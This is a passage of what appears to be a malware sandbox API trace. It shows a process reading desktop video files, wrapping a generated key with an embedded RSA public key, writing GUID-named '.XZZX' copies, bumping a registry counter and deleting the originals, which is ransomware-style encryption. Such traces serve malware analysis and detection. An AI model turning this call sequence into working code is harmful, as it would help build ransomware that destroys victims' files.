HALPmcxz\\Desktop\\R29FEAYxqzGKfm4iuq.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\r29feayxqzgkfm4iuq.wav")) returned 0 Thread: id = 562 os_tid = 0x210 [0166.647] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0166.647] lstrcpyW (in: lpString1=0x2aaf460, lpString2="RcaCR.avi" | out: lpString1="RcaCR.avi") returned="RcaCR.avi" [0166.647] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0166.647] SetErrorMode (uMode=0x1) returned 0x1 [0166.647] lstrcpyW (in: lpString1=0x2aaf860, lpString2="RcaCR.avi" | out: lpString1="RcaCR.avi") returned="RcaCR.avi" [0166.647] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0x2845afae, Data2=0x5e52, Data3=0x4f76, Data4=([0]=0xb3, [1]=0xb, [2]=0xf9, [3]=0xe, [4]=0x6c, [5]=0x4b, [6]=0x17, [7]=0xfa))) returned 0x0 [0166.647] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RcaCR.avi") returned 51 [0166.647] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0166.647] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7CD429BC1D46C7CC2845AFAE1FF1AC14.XZZX") returned 79 [0166.647] StrStrW (lpFirst="RcaCR.avi", lpSrch="XZZX") returned 0x0 [0166.647] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RcaCR.avi", dwFileAttributes=0x20) returned 1 [0166.647] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RcaCR.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rcacr.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x97c [0166.648] ReadFile (in: hFile=0x97c, lpBuffer=0x43ac728, nNumberOfBytesToRead=0x890c, lpNumberOfBytesRead=0x2aae418, lpOverlapped=0x0 | out: lpBuffer=0x43ac728*, lpNumberOfBytesRead=0x2aae418*=0x890c, lpOverlapped=0x0) returned 1 [0166.648] CloseHandle (hObject=0x97c) returned 1 [0166.648] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x1ca0000 [0166.648] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x1cb0000 [0166.648] SetErrorMode (uMode=0x1) returned 0x1 [0166.648] lstrcpyW (in: lpString1=0x2aae358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0166.648] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cc2750) returned 1 [0166.650] CryptGenKey (in: hProv=0x3cc2750, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x43728b8) returned 1 [0166.767] CryptExportKey (in: hKey=0x43728b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x2aae41c | out: pbData=0x0*, pdwDataLen=0x2aae41c*=0x94) returned 1 [0166.767] CryptExportKey (in: hKey=0x43728b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x1cb0000, pdwDataLen=0x2aae41c | out: pbData=0x1cb0000*, pdwDataLen=0x2aae41c*=0x94) returned 1 [0166.767] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0166.767] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0166.767] CryptDestroyKey (hKey=0x43728b8) returned 1 [0166.768] CryptReleaseContext (hProv=0x3cc2750, dwFlags=0x0) returned 1 [0166.768] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7CD429BC1D46C7CC2845AFAE1FF1AC14.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7cd429bc1d46c7cc2845afae1ff1ac14.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x984 [0166.768] WriteFile (in: hFile=0x984, lpBuffer=0x43ac728*, nNumberOfBytesToWrite=0x890c, lpNumberOfBytesWritten=0x2aae438, lpOverlapped=0x0 | out: lpBuffer=0x43ac728*, lpNumberOfBytesWritten=0x2aae438*=0x890c, lpOverlapped=0x0) returned 1 [0166.769] SetFilePointer (in: hFile=0x984, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x890c [0166.769] WriteFile (in: hFile=0x984, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x2aae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x2aae438*=0x5, lpOverlapped=0x0) returned 1 [0166.769] SetFilePointer (in: hFile=0x984, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x8911 [0166.769] WriteFile (in: hFile=0x984, lpBuffer=0x2aaf860*, nNumberOfBytesToWrite=0x12, lpNumberOfBytesWritten=0x2aae438, lpOverlapped=0x0 | out: lpBuffer=0x2aaf860*, lpNumberOfBytesWritten=0x2aae438*=0x12, lpOverlapped=0x0) returned 1 [0166.769] SetFilePointer (in: hFile=0x984, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x8923 [0166.769] WriteFile (in: hFile=0x984, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x2aae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x2aae438*=0x5, lpOverlapped=0x0) returned 1 [0166.769] SetFilePointer (in: hFile=0x984, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x8928 [0166.769] SetErrorMode (uMode=0x1) returned 0x1 [0166.769] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0166.769] OutputDebugStringW (lpOutputString="end") [0166.770] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x80\x8cÊ\x03`Õª\x02â", cchString=0x0, dwFlags=0x0, pbBinary=0x2aadbf4, pcbBinary=0x2aad3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2aadbf4, pcbBinary=0x2aad3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0166.770] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2aadbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2aad3dc, pcbStructInfo=0x2aad3d8 | out: pvStructInfo=0x2aad3dc, pcbStructInfo=0x2aad3d8) returned 1 [0166.770] CryptAcquireContextW (in: phProv=0x2aad3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2aad3e4*=0x3cc2750) returned 1 [0166.770] CryptImportPublicKeyInfo (in: hCryptProv=0x3cc2750, dwCertEncodingType=0x1, pInfo=0x437ead8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x437eb08*, PublicKey.cbData=0x8c, PublicKey.pbData=0x437eb10*, PublicKey.cUnusedBits=0x0), phKey=0x2aad3ec | out: phKey=0x2aad3ec*=0x4372ab8) returned 1 [0166.770] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0166.771] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0166.771] CryptEncrypt (in: hKey=0x4372ab8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2aad3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x2aad3f0*=0x80) returned 1 [0166.771] CryptEncrypt (in: hKey=0x4372ab8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cc27d8*, pdwDataLen=0x2aad3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cc27d8*, pdwDataLen=0x2aad3e8*=0x80) returned 1 [0166.771] WriteFile (in: hFile=0x984, lpBuffer=0x3cc27d8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2aae438, lpOverlapped=0x0 | out: lpBuffer=0x3cc27d8*, lpNumberOfBytesWritten=0x2aae438*=0x80, lpOverlapped=0x0) returned 1 [0166.771] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0166.771] WriteFile (in: hFile=0x984, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x2aae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x2aae438*=0x5, lpOverlapped=0x0) returned 1 [0166.771] GetUserNameW (in: lpBuffer=0x2aae1f8, pcbBuffer=0x2aadfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x2aadfe0) returned 1 [0166.772] wsprintfW (in: param_1=0x2aadff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0166.772] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x2aadfe4 | out: phkResult=0x2aadfe4*=0x97c) returned 0x0 [0166.773] RegQueryValueExW (in: hKey=0x97c, lpValueName="E1010314", lpReserved=0x0, lpType=0x2aadfd8, lpData=0x2aadfec, lpcbData=0x2aadfdc*=0x4 | out: lpType=0x2aadfd8*=0x4, lpData=0x2aadfec*=0xed, lpcbData=0x2aadfdc*=0x4) returned 0x0 [0166.773] RegCloseKey (hKey=0x97c) returned 0x0 [0166.773] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x2aadfe8 | out: phkResult=0x2aadfe8*=0x97c) returned 0x0 [0166.773] RegSetValueExW (in: hKey=0x97c, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x2aadfec*=0xee, cbData=0x4 | out: lpData=0x2aadfec*=0xee) returned 0x0 [0166.773] RegCloseKey (hKey=0x97c) returned 0x0 [0166.773] VirtualFree (lpAddress=0x1ca0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0166.773] VirtualFree (lpAddress=0x1cb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0166.773] CloseHandle (hObject=0x984) returned 1 [0166.774] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0166.774] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0166.774] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RcaCR.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rcacr.avi")) returned 1 [0166.775] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RcaCR.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rcacr.avi")) returned 0 Thread: id = 563 os_tid = 0x124 [0166.776] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0166.776] lstrcpyW (in: lpString1=0x29af460, lpString2="SdgI3.mp4" | out: lpString1="SdgI3.mp4") returned="SdgI3.mp4" [0166.776] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0166.776] SetErrorMode (uMode=0x1) returned 0x1 [0166.776] lstrcpyW (in: lpString1=0x29af860, lpString2="SdgI3.mp4" | out: lpString1="SdgI3.mp4") returned="SdgI3.mp4" [0166.776] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0x1dc4141, Data2=0x8e93, Data3=0x4529, Data4=([0]=0xbc, [1]=0xb9, [2]=0x52, [3]=0x21, [4]=0xb5, [5]=0xdc, [6]=0x4b, [7]=0x41))) returned 0x0 [0166.776] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SdgI3.mp4") returned 51 [0166.776] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0166.776] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3DAB86532684748B01DC4141291F58D3.XZZX") returned 79 [0166.777] StrStrW (lpFirst="SdgI3.mp4", lpSrch="XZZX") returned 0x0 [0166.777] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SdgI3.mp4", dwFileAttributes=0x20) returned 1 [0166.777] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SdgI3.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\sdgi3.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x988 [0166.777] ReadFile (in: hFile=0x988, lpBuffer=0x43b7d70, nNumberOfBytesToRead=0xe104, lpNumberOfBytesRead=0x29ae418, lpOverlapped=0x0 | out: lpBuffer=0x43b7d70*, lpNumberOfBytesRead=0x29ae418*=0xe104, lpOverlapped=0x0) returned 1 [0166.777] CloseHandle (hObject=0x988) returned 1 [0166.777] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x1ca0000 [0166.778] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x1cb0000 [0166.778] SetErrorMode (uMode=0x1) returned 0x1 [0166.778] lstrcpyW (in: lpString1=0x29ae358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0166.778] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cc2860) returned 1 [0166.781] CryptGenKey (in: hProv=0x3cc2860, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x43728b8) returned 1 [0166.893] CryptExportKey (in: hKey=0x43728b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ae41c | out: pbData=0x0*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0166.893] CryptExportKey (in: hKey=0x43728b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x1cb0000, pdwDataLen=0x29ae41c | out: pbData=0x1cb0000*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0166.893] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0166.894] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0166.894] CryptDestroyKey (hKey=0x43728b8) returned 1 [0166.894] CryptReleaseContext (hProv=0x3cc2860, dwFlags=0x0) returned 1 [0166.894] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3DAB86532684748B01DC4141291F58D3.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\3dab86532684748b01dc4141291f58d3.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x988 [0166.894] WriteFile (in: hFile=0x988, lpBuffer=0x43b7d70*, nNumberOfBytesToWrite=0xe104, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x43b7d70*, lpNumberOfBytesWritten=0x29ae438*=0xe104, lpOverlapped=0x0) returned 1 [0166.895] SetFilePointer (in: hFile=0x988, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe104 [0166.895] WriteFile (in: hFile=0x988, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0166.895] SetFilePointer (in: hFile=0x988, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe109 [0166.895] WriteFile (in: hFile=0x988, lpBuffer=0x29af860*, nNumberOfBytesToWrite=0x12, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x29af860*, lpNumberOfBytesWritten=0x29ae438*=0x12, lpOverlapped=0x0) returned 1 [0166.895] SetFilePointer (in: hFile=0x988, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe11b [0166.895] WriteFile (in: hFile=0x988, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0166.896] SetFilePointer (in: hFile=0x988, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe120 [0166.896] SetErrorMode (uMode=0x1) returned 0x1 [0166.896] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0166.896] OutputDebugStringW (lpOutputString="end") [0166.896] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x80\x8cÊ\x03`Õ\x9a\x02â", cchString=0x0, dwFlags=0x0, pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0166.896] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x29adbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8 | out: pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8) returned 1 [0166.896] CryptAcquireContextW (in: phProv=0x29ad3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x29ad3e4*=0x3cc2860) returned 1 [0166.896] CryptImportPublicKeyInfo (in: hCryptProv=0x3cc2860, dwCertEncodingType=0x1, pInfo=0x437efb8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x437efe8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x437eff0*, PublicKey.cUnusedBits=0x0), phKey=0x29ad3ec | out: phKey=0x29ad3ec*=0x4372af8) returned 1 [0166.896] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0166.897] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0166.897] CryptEncrypt (in: hKey=0x4372af8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ad3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x29ad3f0*=0x80) returned 1 [0166.897] CryptEncrypt (in: hKey=0x4372af8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cc28e8*, pdwDataLen=0x29ad3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cc28e8*, pdwDataLen=0x29ad3e8*=0x80) returned 1 [0166.897] WriteFile (in: hFile=0x988, lpBuffer=0x3cc28e8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x3cc28e8*, lpNumberOfBytesWritten=0x29ae438*=0x80, lpOverlapped=0x0) returned 1 [0166.897] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0166.897] WriteFile (in: hFile=0x988, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0166.897] GetUserNameW (in: lpBuffer=0x29ae1f8, pcbBuffer=0x29adfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x29adfe0) returned 1 [0166.897] wsprintfW (in: param_1=0x29adff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0166.898] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe4 | out: phkResult=0x29adfe4*=0x97c) returned 0x0 [0166.898] RegQueryValueExW (in: hKey=0x97c, lpValueName="E1010314", lpReserved=0x0, lpType=0x29adfd8, lpData=0x29adfec, lpcbData=0x29adfdc*=0x4 | out: lpType=0x29adfd8*=0x4, lpData=0x29adfec*=0xee, lpcbData=0x29adfdc*=0x4) returned 0x0 [0166.898] RegCloseKey (hKey=0x97c) returned 0x0 [0166.898] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe8 | out: phkResult=0x29adfe8*=0x97c) returned 0x0 [0166.898] RegSetValueExW (in: hKey=0x97c, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x29adfec*=0xef, cbData=0x4 | out: lpData=0x29adfec*=0xef) returned 0x0 [0166.898] RegCloseKey (hKey=0x97c) returned 0x0 [0166.898] VirtualFree (lpAddress=0x1ca0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0166.898] VirtualFree (lpAddress=0x1cb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0166.898] CloseHandle (hObject=0x988) returned 1 [0166.898] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0166.899] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0166.899] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SdgI3.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\sdgi3.mp4")) returned 1 [0166.900] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SdgI3.mp4" (normalized: "c:\\users\\5p5nrgjn0js 